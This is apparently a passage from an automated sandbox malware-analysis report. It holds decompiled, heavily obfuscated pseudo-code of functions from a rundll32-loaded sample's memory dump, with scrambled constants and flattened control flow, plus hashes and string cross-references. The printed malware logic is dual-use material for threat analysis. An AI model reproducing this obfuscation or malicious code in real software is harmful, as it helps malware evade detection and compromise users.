				_v80 = _v80 ^ 0xf33fed7c;
				_v12 = 0x5e32;
				_v12 = _v12 >> 5;
				_v12 = _v12 | 0xb939d170;
				_v12 = _v12 + 0xffffe46d;
				_v12 = _v12 ^ 0xb939c5f3;
				_v72 = 0xdcc7;
				_t212 = 5;
				_v72 = _v72 / _t212;
				_v72 = _v72 ^ 0x00000998;
				_v52 = 0xf409;
				_v52 = _v52 >> 7;
				_v52 = _v52 >> 2;
				_v52 = _v52 ^ 0x00002b61;
				_v20 = 0x5cd8;
				_v20 = _v20 + 0x5908;
				_v20 = _v20 * 0x1c;
				_v20 = _v20 * 0x14;
				_v20 = _v20 ^ 0x018d9ab8;
				_v32 = 0x162d;
				_v32 = _v32 + 0xffff1b5c;
				_v32 = _v32 >> 3;
				_v32 = _v32 ^ 0x1fff9926;
				_v64 = 0x95af;
				_v64 = _v64 + 0xffff7063;
				_v64 = _v64 ^ 0x00004670;
				_v56 = 0xeead;
				_v56 = _v56 + 0xffffd284;
				_v56 = _v56 ^ 0x94a6c65a;
				_v56 = _v56 ^ 0x94a662be;
				_v68 = 0xa18;
				_v68 = _v68 >> 0xa;
				_v68 = _v68 ^ 0x0000400d;
				_v48 = 0xd4d3;
				_v48 = _v48 * 3;
				_v48 = _v48 << 3;
				_v48 = _v48 ^ 0x0013dfa3;
				_v24 = 0x2d4a;
				_v24 = _v24 << 9;
				_v24 = _v24 + 0x17ff;
				_v24 = _v24 ^ 0x005aa30d;
				do {
					while(_t190 != 0x17ec002) {
						if(_t190 == 0x20702549) {
							_push(_v36);
							_t180 = E0021889D(0x21c930, _v76, __eflags);
							_t182 =  *0x21ca2c; // 0x495cc8
							_t206 =  *0x21ca2c; // 0x495cc8
							E002029E3(_t206, 0x104, _t180, _v28, _v80, _v12, _t182 + 0x230,  &_v1128, _v72, _v52);
							E00212025(_v20, _t180, _v32, _v64);
							_t214 = _t214 + 0x30;
							_t190 = 0x17ec002;
							continue;
						} else {
							if(_t190 == 0x374ac1da) {
								_push(_t190);
								_push(_t190);
								E0020C6C7(_v60, _v8,  &_v608, _t190, _v44, _v40, _v16);
								_t214 = _t214 + 0x1c;
								_t190 = 0x20702549;
								continue;
							}
						}
						goto L7;
					}
					_push(_t190);
					_push(_v24);
					_push(0);
					_push(_v48);
					_push(0);
					_push(_v68);
					_push( &_v1128);
					_t179 = E0020568E(_v56, 0);
					_t214 = _t214 + 0x1c;
					__eflags = _t179;
					_t209 =  !=  ? 1 : _t209;
					_t190 = 0x3985ca2d;
					L7:
					__eflags = _t190 - 0x3985ca2d;
				} while (__eflags != 0);
				return _t209;
			}

0x002062ac
0x002062b8
0x002062ba
0x002062bf
0x002062c2
0x002062c9
0x002062cd
0x002062d1
0x002062d8
0x002062e4
0x002062e9
0x002062ee
0x002062f5
0x002062fc
0x00206303
0x00206307
0x0020630b
0x00206312
0x00206319
0x0020631d
0x00206321
0x00206328
0x00206333
0x00206336
0x00206339
0x00206340
0x00206347
0x0020634e
0x00206355
0x0020635c
0x00206363
0x0020636a
0x00206371
0x00206378
0x0020637f
0x00206386
0x00206394
0x00206397
0x0020639e
0x002063a5
0x002063ac
0x002063b3
0x002063ba
0x002063be
0x002063c5
0x002063cc
0x002063d3
0x002063dd
0x002063e0
0x002063e3
0x002063ea
0x002063f1
0x002063f5
0x002063f9
0x00206400
0x00206407
0x00206412
0x00206419
0x0020641c
0x00206423
0x0020642a
0x00206431
0x00206435
0x0020643c
0x00206448
0x0020644f
0x00206456
0x0020645d
0x00206464
0x0020646b
0x00206472
0x00206479
0x0020647d
0x00206484
0x0020648f
0x00206492
0x00206496
0x0020649d
0x002064a4
0x002064a8
0x002064af
0x002064b6
0x002064b6
0x002064c4
0x002064f7
0x00206502
0x0020651c
0x00206530
0x0020653c
0x0020654c
0x00206551
0x00206554
0x00000000
0x002064c6
0x002064cc
0x002064d2
0x002064d3
0x002064eb
0x002064f0
0x002064f3
0x00000000
0x002064f3
0x002064cc
0x00000000
0x002064c4
0x0020655e
0x0020655f
0x0020656a
0x0020656c
0x0020656f
0x00206571
0x00206577
0x00206578
0x0020657f
0x00206583
0x00206585
0x00206588
0x0020658d
0x0020658d
0x0020658d
0x002065a1

Strings

I%p , xrefs: 00206443

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: I%p
API String ID: 0-3985577374
Opcode ID: 190537506cdbac6de6e42bfe38c6ef12b4caa4be1e7ca1ec02bf864f9612f463
Instruction ID: 4a90c6dd6bc983f09bb63f164c04518782ea3940b3429617ec743cace701e0da
Opcode Fuzzy Hash: 190537506cdbac6de6e42bfe38c6ef12b4caa4be1e7ca1ec02bf864f9612f463
Instruction Fuzzy Hash: 198147B1C0020DABDF18CFE5D94A9DEBBB1FF44318F208159E112B62A0D7B90A19CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00210D33, Relevance: 1.4, Strings: 1, Instructions: 122
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00210D33(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v40;
				signed int _v44;
				char _v48;
				void* _t128;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				void* _t173;
				signed int _t174;

				_push(_a12);
				_t173 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0020602B(_t128);
				_v8 = 0x6813;
				_v8 = _v8 << 6;
				_v8 = _v8 ^ 0xf4e07894;
				_v8 = _v8 | 0x641e1778;
				_v8 = _v8 ^ 0xf4fe1535;
				_v16 = 0x7d9d;
				_t155 = 0x16;
				_v16 = _v16 * 0x4d;
				_v16 = _v16 ^ 0x0025b62f;
				_v32 = 0xbd8b;
				_v32 = _v32 ^ 0xdfb27dce;
				_v32 = _v32 / _t155;
				_v32 = _v32 ^ 0x0a2b09ce;
				_v28 = 0xad22;
				_t156 = 0x34;
				_v28 = _v28 * 0x47;
				_v28 = _v28 + 0x4161;
				_v28 = _v28 ^ 0x00307d44;
				_v36 = 0xa165;
				_v36 = _v36 >> 2;
				_v36 = _v36 ^ 0x00006be3;
				_v12 = 0xca43;
				_v12 = _v12 << 7;
				_v12 = _v12 + 0x4480;
				_v12 = _v12 >> 0x10;
				_v12 = _v12 ^ 0x00004998;
				_v44 = 0xc326;
				_v44 = _v44 / _t156;
				_v44 = _v44 ^ 0x000051cc;
				_v40 = 0xa768;
				_v40 = _v40 / _t156;
				_v40 = _v40 ^ 0x00002cdd;
				_v24 = 0x8f0;
				_v24 = _v24 << 2;
				_v24 = _v24 + 0xffff08f5;
				_v24 = _v24 | 0x28f06395;
				_v24 = _v24 ^ 0xffff76ac;
				_v20 = 0x26e;
				_v20 = _v20 + 0xffffc9ca;
				_v20 = _v20 + 0x3d88;
				_v20 = _v20 * 0x16;
				_v20 = _v20 ^ 0x00008c1f;
				_v48 = E00218C8F(_t156);
				_v8 = 0xba8c;
				_v8 = _v8 + 0xffff546f;
				_v8 = _v8 | 0xb28855c5;
				_v8 = _v8 ^ 0xa47da239;
				_v8 = _v8 ^ 0x16f5fdc2;
				_v16 = 0x4025;
				_t157 = 0xb;
				_v16 = _v16 / _t157;
				_v16 = _v16 + 0xffffba03;
				_t158 = 0x3b;
				_v16 = _v16 / _t158;
				_v16 = _v16 ^ 0x0456c691;
				_t174 = E002078A5(_t158, _t158, _v16, _t158, _v8);
				E00207787(_v44, _t174, _v40,  &_v48, _v24, _v20, _t173);
				 *((short*)(_t173 + _t174 * 2)) = 0;
				return 0;
			}

0x00210d3b
0x00210d3e
0x00210d40
0x00210d43
0x00210d47
0x00210d48
0x00210d4d
0x00210d57
0x00210d5d
0x00210d64
0x00210d6b
0x00210d72
0x00210d7f
0x00210d82
0x00210d85
0x00210d8c
0x00210d93
0x00210da1
0x00210da4
0x00210dab
0x00210db6
0x00210db7
0x00210dba
0x00210dc1
0x00210dc8
0x00210dcf
0x00210dd3
0x00210dda
0x00210de1
0x00210de5
0x00210dec
0x00210df0
0x00210df7
0x00210e05
0x00210e08
0x00210e0f
0x00210e1b
0x00210e1e
0x00210e25
0x00210e2c
0x00210e30
0x00210e37
0x00210e3e
0x00210e45
0x00210e4c
0x00210e53
0x00210e5e
0x00210e61
0x00210e73
0x00210e78
0x00210e7f
0x00210e86
0x00210e8d
0x00210e94
0x00210e9b
0x00210ea7
0x00210eaa
0x00210eaf
0x00210ebb
0x00210ebe
0x00210ec1
0x00210ee5
0x00210ef8
0x00210f02
0x00210f0b

Strings

D}0, xrefs: 00210DC1

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: D}0
API String ID: 0-882559769
Opcode ID: 0055a96e36ec0fc3778ffa7d8bdc67593becc071738deaf1b770c418e059c371
Instruction ID: 89f17d18c990d16a78f8038af5f17dd2e64378e1f48e4543662cfeaee04eac87
Opcode Fuzzy Hash: 0055a96e36ec0fc3778ffa7d8bdc67593becc071738deaf1b770c418e059c371
Instruction Fuzzy Hash: 4451F4B1D0130AEBDF09CFA5C94A4EEBBB2FB44304F108199E111B6290D7B95B55CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0021340A, Relevance: 1.4, Strings: 1, Instructions: 118
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E0021340A(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				void* _t88;
				void* _t94;
				void* _t100;
				void* _t102;
				intOrPtr _t117;
				signed int _t118;
				signed int* _t121;

				_t116 = _a8;
				_t100 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0020602B(_t88);
				_v88 = 0x94797;
				_t117 = 0;
				_v84 = 0xfccb1;
				_t121 =  &(( &_v124)[4]);
				_v80 = 0;
				_v120 = 0xe518;
				_t102 = 0x2e39b5d1;
				_v120 = _v120 >> 0xf;
				_v120 = _v120 | 0x8d2dde7f;
				_v120 = _v120 ^ 0x46a7e325;
				_v120 = _v120 ^ 0xcb8a2201;
				_v124 = 0x16d5;
				_v124 = _v124 >> 0xe;
				_v124 = _v124 | 0x69fc1cf8;
				_t118 = 0x78;
				_v124 = _v124 * 0x21;
				_v124 = _v124 ^ 0xa97fd862;
				_v104 = 0xc3ad;
				_v104 = _v104 * 0x54;
				_v104 = _v104 ^ 0x00400d02;
				_v112 = 0x42c5;
				_v112 = _v112 ^ 0xf5e3cf1a;
				_v112 = _v112 ^ 0xb2e8281c;
				_v112 = _v112 | 0x1ecbfa7f;
				_v112 = _v112 ^ 0x5fcbcd35;
				_v96 = 0xbfa3;
				_v96 = _v96 ^ 0x0400a118;
				_v96 = _v96 ^ 0x04005591;
				_v116 = 0x719c;
				_v116 = _v116 / _t118;
				_v116 = _v116 << 3;
				_v116 = _v116 + 0xbb41;
				_v116 = _v116 ^ 0x0000fc42;
				_v100 = 0x8c7a;
				_v100 = _v100 << 3;
				_v100 = _v100 ^ 0x0004412d;
				_v92 = 0xd0f9;
				_v92 = _v92 + 0xffffb579;
				_v92 = _v92 ^ 0x0000a3c3;
				_v108 = 0x6440;
				_v108 = _v108 ^ 0x55818320;
				_v108 = _v108 << 0xf;
				_v108 = _v108 + 0x2c19;
				_v108 = _v108 ^ 0xf3b003dd;
				do {
					while(_t102 != 0x4681a3b) {
						if(_t102 == 0xbf6d415) {
							__eflags = E0020B055(_v92, _v108, __eflags,  &_v76, _t116 + 4);
							_t117 =  !=  ? 1 : _t117;
						} else {
							if(_t102 == 0x17b92136) {
								E002150F2( &_v76, _v120, _v124, _v104, _t100);
								_t121 =  &(_t121[3]);
								_t102 = 0x4681a3b;
								continue;
							} else {
								if(_t102 != 0x2e39b5d1) {
									goto L10;
								} else {
									_t102 = 0x17b92136;
									continue;
								}
							}
						}
						L13:
						return _t117;
					}
					_t94 = E00218F11( &_v76, _v112, _v96, _t116, _v116, _v100);
					_t121 =  &(_t121[4]);
					__eflags = _t94;
					if(__eflags == 0) {
						_t102 = 0x114ebae0;
						goto L10;
					} else {
						_t102 = 0xbf6d415;
						continue;
					}
					goto L13;
					L10:
					__eflags = _t102 - 0x114ebae0;
				} while (__eflags != 0);
				goto L13;
			}

0x00213411
0x00213418
0x0021341a
0x0021341b
0x00213422
0x00213423
0x00213424
0x00213429
0x00213431
0x00213433
0x0021343b
0x0021343e
0x00213444
0x0021344c
0x00213451
0x00213456
0x0021345e
0x00213466
0x0021346e
0x00213476
0x0021347b
0x0021348a
0x0021348b
0x0021348f
0x00213497
0x002134a4
0x002134a8
0x002134b0
0x002134b8
0x002134c0
0x002134c8
0x002134d0
0x002134d8
0x002134e0
0x002134e8
0x002134f0
0x00213503
0x00213507
0x0021350c
0x00213514
0x0021351c
0x00213524
0x00213529
0x00213531
0x00213539
0x00213541
0x00213549
0x00213551
0x00213559
0x0021355e
0x00213566
0x0021356e
0x0021356e
0x00213578
0x00213600
0x00213602
0x0021357a
0x00213580
0x002135a2
0x002135a7
0x002135aa
0x00000000
0x00213582
0x00213588
0x00000000
0x0021358a
0x0021358a
0x00000000
0x0021358a
0x00213588
0x00213580
0x00213606
0x0021360e
0x0021360e
0x002135c6
0x002135cb
0x002135ce
0x002135d0
0x002135d6
0x00000000
0x002135d2
0x002135d2
0x00000000
0x002135d2
0x00000000
0x002135db
0x002135db
0x002135db
0x00000000

Strings

@d, xrefs: 00213549

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: @d
API String ID: 0-4219467963
Opcode ID: 84c63284fc0912dd3544375fe592f81bfaac633f79c2e287a3bc015bf26ad4b2
Instruction ID: 750acfba27d160b42e5a54b4fad90c74c7ba8a72f076043f1273b925fd9d7648
Opcode Fuzzy Hash: 84c63284fc0912dd3544375fe592f81bfaac633f79c2e287a3bc015bf26ad4b2
Instruction Fuzzy Hash: 245178B11083429BD318CF21C84A85FFBE2BBE8B48F504A1DF59A52160D775CA598F87

Uniqueness

Uniqueness Score: -1.00%

Function 00213FE7, Relevance: 1.4, Strings: 1, Instructions: 115
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00213FE7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				void* _t80;
				signed int _t94;
				signed int _t95;
				void* _t98;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;

				_push(_a8);
				_t114 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0020602B(_t80);
				_v96 = 0xd1bf;
				_t118 = _t117 + 0x10;
				_t115 = 0;
				_t98 = 0x349149b3;
				_t94 = 0x64;
				_v96 = _v96 / _t94;
				_v96 = _v96 ^ 0x00007874;
				_v104 = 0x2a01;
				_v104 = _v104 + 0x4d1a;
				_v104 = _v104 + 0xb0bd;
				_v104 = _v104 ^ 0x00017b91;
				_v108 = 0x44db;
				_v108 = _v108 + 0xffff0b38;
				_t95 = 0x1c;
				_v108 = _v108 * 7;
				_v108 = _v108 ^ 0xfffb0952;
				_v112 = 0x5707;
				_v112 = _v112 + 0x69dd;
				_v112 = _v112 + 0xef17;
				_v112 = _v112 | 0x7086095e;
				_v112 = _v112 ^ 0x7087ed58;
				_v92 = 0x8129;
				_v92 = _v92 >> 3;
				_v92 = _v92 ^ 0x00001eae;
				_v80 = 0x8f03;
				_v80 = _v80 ^ 0x5fd75a11;
				_v80 = _v80 ^ 0x5fd7f025;
				_v84 = 0x94fc;
				_v84 = _v84 >> 0x10;
				_v84 = _v84 ^ 0x00001c7c;
				_v100 = 0xd584;
				_v100 = _v100 >> 0xe;
				_v100 = _v100 / _t95;
				_v100 = _v100 ^ 0x00001ad3;
				_v88 = 0x35b5;
				_v88 = _v88 * 0x43;
				_v88 = _v88 ^ 0x000e607f;
				do {
					while(_t98 != 0x2d9dd110) {
						if(_t98 == 0x2e4dc862) {
							__eflags = E00218F11( &_v76, _v80, _v84, _t114 + 8, _v100, _v88);
							_t115 =  !=  ? 1 : _t115;
						} else {
							if(_t98 == 0x32f61d6a) {
								E002150F2( &_v76, _v96, _v104, _v108, _a8);
								_t118 = _t118 + 0xc;
								_t98 = 0x2d9dd110;
								continue;
							} else {
								if(_t98 != 0x349149b3) {
									goto L10;
								} else {
									_t98 = 0x32f61d6a;
									continue;
								}
							}
						}
						L13:
						return _t115;
					}
					__eflags = E0020B055(_v112, _v92, __eflags,  &_v76, _t114);
					if(__eflags == 0) {
						_t98 = 0x5080212;
						goto L10;
					} else {
						_t98 = 0x2e4dc862;
						continue;
					}
					goto L13;
					L10:
					__eflags = _t98 - 0x5080212;
				} while (__eflags != 0);
				goto L13;
			}

0x00213fee
0x00213ff5
0x00213ff7
0x00213ffe
0x00213fff
0x00214000
0x00214005
0x0021400d
0x00214016
0x00214018
0x00214024
0x00214029
0x0021402f
0x00214037
0x0021403f
0x00214047
0x0021404f
0x00214057
0x0021405f
0x0021406c
0x0021406d
0x00214071
0x00214079
0x00214081
0x00214089
0x00214091
0x00214099
0x002140a1
0x002140a9
0x002140ae
0x002140b6
0x002140be
0x002140c6
0x002140ce
0x002140d6
0x002140db
0x002140e3
0x002140eb
0x002140fb
0x002140ff
0x00214107
0x00214114
0x00214118
0x00214120
0x00214120
0x0021412a
0x002141b1
0x002141b3
0x0021412c
0x0021412e
0x00214153
0x00214158
0x0021415b
0x00000000
0x00214130
0x00214136
0x00000000
0x00214138
0x00214138
0x00000000
0x00214138
0x00214136
0x0021412e
0x002141b7
0x002141bf
0x002141bf
0x00214177
0x00214179
0x0021417f
0x00000000
0x0021417b
0x0021417b
0x00000000
0x0021417b
0x00000000
0x00214184
0x00214184
0x00214184
0x00000000

Strings

tx, xrefs: 0021402F

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: tx
API String ID: 0-1414813443
Opcode ID: 7a271fa6b78f15920441f448b7bb9f475cb0270aa55ebeddac197ee12bed0436
Instruction ID: fa4e05f39738f991b88f185ff60793ccc22e18e950e517beb40060fbfc870beb
Opcode Fuzzy Hash: 7a271fa6b78f15920441f448b7bb9f475cb0270aa55ebeddac197ee12bed0436
Instruction Fuzzy Hash: 7441AD71508342ABE718DE21C88586FBBE1FBE8718F104A1DF5C9962A0D7B5CA59CF43

Uniqueness

Uniqueness Score: -1.00%

Function 002060B9, Relevance: 1.4, Strings: 1, Instructions: 104
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E002060B9(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				void* _t104;
				void* _t109;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				void* _t128;

				_push(_a20);
				_t109 = __ecx;
				_t111 = _a16;
				_push(_a16);
				_push(_a12);
				_v44 = 0x104;
				_push(0x104);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0020602B(0x104);
				_v8 = 0xaf29;
				_v8 = _v8 >> 0xe;
				_t128 = 0;
				_v8 = _v8 >> 4;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x0000662d;
				_v20 = 0xac55;
				_v20 = _v20 | 0x2323cee5;
				_t124 = 0x4c;
				_v20 = _v20 / _t124;
				_v20 = _v20 ^ 0x007629b6;
				_v16 = 0xabf2;
				_v16 = _v16 | 0x220f7c85;
				_v16 = _v16 + 0xffff7509;
				_v16 = _v16 ^ 0x220f51b4;
				_v40 = 0x3232;
				_t125 = 0x1f;
				_v40 = _v40 / _t125;
				_v40 = _v40 ^ 0x00004228;
				_v36 = 0x2ec1;
				_v36 = _v36 | 0xae4e7a63;
				_v36 = _v36 ^ 0xae4e526e;
				_v12 = 0xa12f;
				_v12 = _v12 << 0xe;
				_v12 = _v12 << 0xb;
				_v12 = _v12 << 0x10;
				_v12 = _v12 ^ 0x00007580;
				_v32 = 0xadd8;
				_v32 = _v32 | 0x6e6f3325;
				_v32 = _v32 ^ 0x5adaef9e;
				_v32 = _v32 ^ 0x34b54fa4;
				_v28 = 0xb293;
				_t126 = 0x3b;
				_v28 = _v28 * 0x2d;
				_v28 = _v28 << 0xb;
				_v28 = _v28 ^ 0xfb1ed4cf;
				_v24 = 0x2b1c;
				_v24 = _v24 * 6;
				_v24 = _v24 / _t126;
				_v24 = _v24 ^ 0x00001462;
				_t104 = E00207551(_a16, _v24);
				_t127 = _t104;
				if(_t104 != 0) {
					_t128 = E00207663(_v40, _v36, _t127, _t109,  &_v44, _t111, _v12);
					E00214F7D(_v32, _v28, _t127);
				}
				return _t128;
			}

0x002060c2
0x002060c5
0x002060cc
0x002060cf
0x002060d0
0x002060d3
0x002060d6
0x002060d7
0x002060da
0x002060db
0x002060dc
0x002060e1
0x002060ea
0x002060ee
0x002060f0
0x002060f4
0x002060f8
0x002060ff
0x00206106
0x00206112
0x00206117
0x0020611c
0x00206123
0x0020612a
0x00206131
0x00206138
0x0020613f
0x00206149
0x0020614e
0x00206153
0x0020615a
0x00206161
0x00206168
0x0020616f
0x00206176
0x0020617a
0x0020617e
0x00206182
0x00206189
0x00206190
0x00206197
0x0020619e
0x002061a5
0x002061b0
0x002061b4
0x002061b7
0x002061bb
0x002061c2
0x002061cd
0x002061d5
0x002061d8
0x002061eb
0x002061f0
0x002061f7
0x00206211
0x00206217
0x0020621c
0x00206227

Strings

%3on, xrefs: 00206190

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: %3on
API String ID: 2962429428-3639271662
Opcode ID: bcb4d8aa597083075a1a4f3e635b6eeb780b205d042a878a759378dadee66bdf
Instruction ID: da3ee51407b77f3a0504c4e6462b207a70c332020a4e4cfacd57f67c12be53f8
Opcode Fuzzy Hash: bcb4d8aa597083075a1a4f3e635b6eeb780b205d042a878a759378dadee66bdf
Instruction Fuzzy Hash: 3A411671E0120AABDB04DFE5C98A8EEFBB5FB44704F208159E911B7250D3B89B55CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0020F536, Relevance: 1.3, Strings: 1, Instructions: 66
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E0020F536(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t73;
				signed int _t84;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0020602B(_t73);
				_v28 = _v28 & 0x00000000;
				_v32 = 0x4854b3;
				_v8 = 0xdc0b;
				_t84 = 0x56;
				_v8 = _v8 * 0xf;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x0001e73e;
				_v12 = 0xfbc9;
				_v12 = _v12 + 0xb4de;
				_v12 = _v12 * 0x28;
				_v12 = _v12 ^ 0x0043d2f8;
				_v12 = 0x51f2;
				_v12 = _v12 + 0xffffcc79;
				_v12 = _v12 + 0xffffba87;
				_v12 = _v12 ^ 0xffffb404;
				_v12 = 0x6c9d;
				_v12 = _v12 / _t84;
				_v12 = _v12 >> 1;
				_v12 = _v12 ^ 0x0000581b;
				_v12 = 0x414e;
				_v12 = _v12 >> 0xd;
				_v12 = _v12 | 0x4fdc2cbe;
				_v12 = _v12 ^ 0x4fdc7af3;
				_v12 = 0xe540;
				_v12 = _v12 * 0x6f;
				_v12 = _v12 ^ 0x1b88e412;
				_v12 = _v12 ^ 0x1bebfc09;
				_v24 = 0x3d7;
				_v24 = _v24 + 0xffffb00b;
				_v24 = _v24 ^ 0xffff901a;
				_v20 = 0xd6b0;
				_v20 = _v20 ^ 0xee2b6cd1;
				_v20 = _v20 ^ 0xee2bf683;
				_v16 = 0x5822;
				_v16 = _v16 + 0xa5f;
				_v16 = _v16 ^ 0x00006b11;
				return E002108F3(_v12, _v24, _v20, _a8, _t84, E0020C506(_t84), _v16);
			}

0x0020f53c
0x0020f53f
0x0020f542
0x0020f543
0x0020f544
0x0020f549
0x0020f550
0x0020f559
0x0020f566
0x0020f567
0x0020f56a
0x0020f56e
0x0020f575
0x0020f57c
0x0020f587
0x0020f58a
0x0020f591
0x0020f598
0x0020f59f
0x0020f5a6
0x0020f5ad
0x0020f5b9
0x0020f5bc
0x0020f5bf
0x0020f5c6
0x0020f5cd
0x0020f5d1
0x0020f5d8
0x0020f5df
0x0020f5ea
0x0020f5ed
0x0020f5f4
0x0020f5fb
0x0020f602
0x0020f609
0x0020f610
0x0020f617
0x0020f61e
0x0020f625
0x0020f62c
0x0020f633
0x0020f65e

Strings

j^ , xrefs: 0020F536

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: j^
API String ID: 0-2773993462
Opcode ID: d6eabca0427ab4eaaf53c26815c4da8668a2aa53d83320917823e6483645e30f
Instruction ID: 61f17ef499e64358e5f1b8c6755e62aefd9296a211a2e40bd69e7eda7457b742
Opcode Fuzzy Hash: d6eabca0427ab4eaaf53c26815c4da8668a2aa53d83320917823e6483645e30f
Instruction Fuzzy Hash: A531EEB4C0070AEBDF48DFA4C98A49EBFB5FB00304F608189D511BA2A1D3B94B959F80

Uniqueness

Uniqueness Score: -1.00%

Function 1002A210, Relevance: 1.3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

Strings

GetSystemTimePreciseAsFileTime, xrefs: 1002A216, 1002A220

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: GetSystemTimePreciseAsFileTime
API String ID: 0-595813830
Opcode ID: a7ae1d8958db0be8601a894f68a80e987dbc301ada32cbee45108d60bb9f4e14
Instruction ID: e8c23879367dcf5bda3c463928159e81a8616328db366f60e4f6970be69a4008
Opcode Fuzzy Hash: a7ae1d8958db0be8601a894f68a80e987dbc301ada32cbee45108d60bb9f4e14
Instruction Fuzzy Hash: 8FE0C233640234B3C210A2956C04EE97A44CF456B2F900032FB18EA522EE22181082D8

Uniqueness

Uniqueness Score: -1.00%

Function 10035BF0, Relevance: .4, Instructions: 375COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
